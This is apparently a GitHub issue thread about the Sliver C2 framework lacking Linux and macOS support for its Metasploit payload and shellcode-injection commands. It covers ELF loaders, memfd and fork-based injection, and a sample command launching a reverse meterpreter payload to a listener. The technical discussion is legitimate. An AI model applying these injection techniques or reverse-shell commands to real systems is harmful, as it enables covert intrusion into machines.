Open mrThe opened 2 years ago
The msf
and msf-inject
commands are not supported for other target OS than Windows. We currently don't have a way to safely execute shellcodes and perform remote injection on other platforms than Windows.
Actually reopening this one for long term support.
The other thing about stageless metasploit payloads for Linux / MacOS: they're not shellcode but plain ELF/MachO binaries. The way the metasploit-framework usually work for those is they use what they call a "mid-stager". They have a first stage shellcode which will then load a second stage, usually an ELF/MachO loader and it's this piece that is going to load mettle
, the metasploit-framework meterpreter payload for unix environments.
So to be able to have the msf
command to work on Linux targets, we'd need to have a working pure-Go ELF loader in the implant code, which we currently don't have. Same thing for MacOS: we'd need a pure-Go MachO loader.
Also, why do you limit available payloads in first place? Maybe i'm missing something, but i don't see why this is required, especially since you support those for windows implants.
This is mainly why: we currently can't load them :)
But how about staged payloads and payloads that can produce shellcode?
For example, I've commented validation on server and tested msf
it with linux/x64/shell_reverse_tcp
and it works, but process then hangs up and\or crash. (well, hang up is technically expected). Still get a msf shell tho.
But with linux/x64/meterpreter/reverse_tcp
which is can be loaded as shell code as well, it sefgaults right away.
So i guess you may split this enhancement into two:
I take some time to play around and to do a small research, and looks like there is no straightforward ways to run shellcode without locking the process in golang.
I guess some weird tricks like forking the process will fix this, but forking in golang is way worse then it can be expected, i've actually tested it out and it kinda works, but process become unstable.
Also, there is some smart ways to load elfs: spawn child process and load elf code into it. And another one, using memfd. Both of them looks pretty good, but i'm curious how well this will work and is there any dependency on system configuration, unfortunately i don't have much experience on this.
References
Since i don't have expertise on that, just hoping my small research will help someone to implement it :)
I'm aware that there are ways to do injection on Linux, it's just so far we don't have a safe implementation ready. On Windows it's easy, you can create a new thread via system APIs. On Linux, you can ever fork
or clone
, and none of those options are super reliable in case of a remote process (you might take over the control flow or crash the process). As far as I read, and as you said, even forking in Go is still troublesome.
It's not that I haven't tried, I actually wrote a PoC in a dedicated branch to inject both a shellcode and a library stored in a memory file descriptor. It's just that at the moment it's janky and unreliable.
I had a quick look at emp3r0r, and sounds like the technique is just to fork/exec, I just wonder how stable it is (ideally you'd want to be able to inject in any process, provided you have the proper permissions to do so).
So right now the status is TBD.
But how about staged payloads and payloads that can produce shellcode?
As you noticed, we lose control of the implant in self-injection and for remote injection, you might crash the remote process / make it unresponsive. Having that option implemented right now would let people think it's safe and ready to use, except it's not.
Describe the bug Unable to build and run msf payloads using
msf
command, because of wrong payload configuration selected.To Reproduce Steps to reproduce the behavior:
msf --lhost 1.1.1.1 --payload meterpreter_reverse_tcp
Logs:
Expected behavior Payload uploads and runs, msf session created
Additional context
As i see, msfvenom does not support
raw
format for payloads are available for linux: https://github.com/BishopFox/sliver/blob/58a56a077f0813bb312f9fa4df7453b510c3a73b/server/msf/msf.goI see it's supported only for staged payloads, like
linux/x64/meterpreter/reverse_tcp
.Also, why do you limit available payloads in first place? Maybe i'm missing something, but i don't see why this is required, especially since you support those for windows implants.
System Msf: Framework: 6.1.44-dev- Console : 6.1.44-dev- Sliver: [*] Client v1.5.12 - aacf2c16ac00e4609231f5faee588bdb9ea9c532 - linux/amd64 Compiled at 2022-04-20 20:06:30 +0000 UTC Compiled with go version go1.18 linux/amd64
[*] Server v1.5.12 - aacf2c16ac00e4609231f5faee588bdb9ea9c532 - linux/amd64 Compiled at 2022-04-20 20:06:30 +0000 UTC